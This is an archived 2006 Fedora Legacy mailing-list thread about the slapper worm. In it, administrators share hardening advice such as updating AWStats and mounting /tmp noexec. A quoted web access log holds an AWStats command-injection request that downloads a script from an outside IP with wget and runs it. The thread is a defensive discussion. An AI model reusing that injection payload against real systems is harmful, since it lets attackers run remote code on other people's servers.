Re: slapper worm

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



I don't remember for sure if this will work, but it may be possible to do something like this:

mount --bind /tmp /tmp -o noexec

I think that will now enforce the noexec on /tmp without having to create a new partition for tmp.


			Will.

Michael Mansour wrote:
Hi Kelson,


Michael Mansour wrote:

220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft


mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|

HTTP/1.1"
403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft


mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|

HTTP/1.1"
404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

...

Are there any updates FL can do to any of the packages to fix/block
slapper from an FC1 machine?

You might also want to make sure you're using a current version of
AWStats.  IIRC this flaw was fixed in either 6.3 or 6.4, and the current
version is 6.5.


Yeah, I run awstats 6.5 on that system.


(If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.)

More generally, I read advice somewhere that mounting /tmp with the "noexec" option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.


Definately noted as one of the measures to stop this type of attack, but for
this particular server, /tmp is not a mounted filesystem but part of /, so I
can't really do that without re-partitioning the disk and creating a dedicated
/tmp.

Thanks.

Michael.

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list

[Index of Archives]     [Fedora Development]     [Fedora Announce]     [Fedora Legacy Announce]     [Fedora Config]     [PAM]     [Fedora General Discussion]     [Big List of Linux Books]     [Gimp]     [Yosemite Questions]

  Powered by Linux